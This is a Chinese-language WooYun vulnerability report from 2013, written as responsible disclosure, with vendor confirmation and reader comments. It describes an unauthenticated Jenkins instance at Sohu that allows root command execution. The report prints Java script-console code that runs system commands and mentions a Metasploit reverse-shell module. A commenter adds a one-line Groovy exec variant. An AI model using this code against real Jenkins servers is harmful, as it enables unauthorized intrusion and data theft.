搜狐某系统为授权访问，致任意命令执行，用户和业务数据可被泄露，威胁内网。

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023234

漏洞标题：搜狐某系统为授权访问，致任意命令执行，用户和业务数据可被泄露，威胁内网。

漏洞作者： stephanie

提交时间：2013-05-07 17:25

修复时间：2013-06-21 17:25

公开时间：2013-06-21 17:25

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-05-07：细节已通知厂商并且等待厂商处理中
2013-05-07：厂商已经确认，细节仅向厂商公开
2013-05-17：细节向核心白帽子及相关领域专家公开
2013-05-27：细节向普通白帽子公开
2013-06-06：细节向实习白帽子公开
2013-06-21：细节向公众公开

简要描述：

百合忽略漏洞，这个名字起的牛b点。。。
主要是某系统为授权可访问，导致可执行任意命令，权限还是root，数据库未做访问限制,数据量很蛮大的。。

详细说明：

此问题是由于他们使用了这个Jenkins系统。而且没有做访问控制。
那Jenkins是基于Java开发的一种持续集成工具，用于监控秩序重复的工作，如果配置不当，可以发安全问题。为授权访问可以造成任意命令执行威胁，metasploit利用可以获得一个反向的shell具体看http://www.exploit-db.com/exploits/24272/。
当然，假如我们没有一个可以反向连接回来的机器，也可以在其脚本命令行处运行java代码来执行任意命令。利用代码如下：

Runtime runtime = Runtime.getRuntime();
    Process process = runtime.exec("id");
    process.getInputStream();
 
    BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
    String inline;
    String returnvalue = "";
    while ((inline = br.readLine()) != null) {
       returnvalue +=( inline );
    }
    br.close();
    out.println(returnvalue);

那后面可以干啥，大家就自己脑补吧。

漏洞证明：

修复方案：

版权声明：转载请注明来源 stephanie@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-05-07 17:58

厂商回复：

已通知业务线进行处理，感谢对搜狐安全的关注。
请把IP地址及邮箱地址打下码。

漏洞评价：

这些评论似乎很乌云~~~思密达

2013-05-17 19:27 | loopx9 ( 核心白帽子 | Rank:602 漏洞数:59 | ..)

执行回显其实可以直接一句话就搞定java.lang.Runtime.getRuntime().exec('id').getText();

2013-05-07 17:26 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

这标题，重金属!
2013-05-07 19:28 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

..
2013-05-08 09:24 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

给力啊。这样的错误。
2013-05-17 19:27 | loopx9 ( 核心白帽子 | Rank:602 漏洞数:59 | ..)

执行回显其实可以直接一句话就搞定java.lang.Runtime.getRuntime().exec('id').getText();
2013-06-06 18:02 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

@loopx9 技巧帝
2013-06-21 19:33 | xiaoxin ( 实习白帽子 | Rank:72 漏洞数:9 | 无)

@loopx9 @疯狗哪个版本的api，竟然有getText()方法，我的jdk7.0都没有
2013-06-21 19:41 | loopx9 ( 核心白帽子 | Rank:602 漏洞数:59 | ..)

@xiaoxin 不是jdk的，jenkins(hudson)自带的
2013-06-22 12:42 | xiaoxin ( 实习白帽子 | Rank:72 漏洞数:9 | 无)

@loopx9 谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023234

漏洞标题：搜狐某系统为授权访问，致任意命令执行，用户和业务数据可被泄露，威胁内网。

相关厂商：搜狐

漏洞作者： stephanie

提交时间：2013-05-07 17:25

修复时间：2013-06-21 17:25

公开时间：2013-06-21 17:25

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 stephanie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-023234

漏洞标题：搜狐某系统为授权访问，致任意命令执行，用户和业务数据可被泄露，威胁内网。

相关厂商：搜狐

漏洞作者： stephanie

提交时间：2013-05-07 17:25

修复时间：2013-06-21 17:25

公开时间：2013-06-21 17:25

漏洞类型：未授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-023234"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 stephanie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：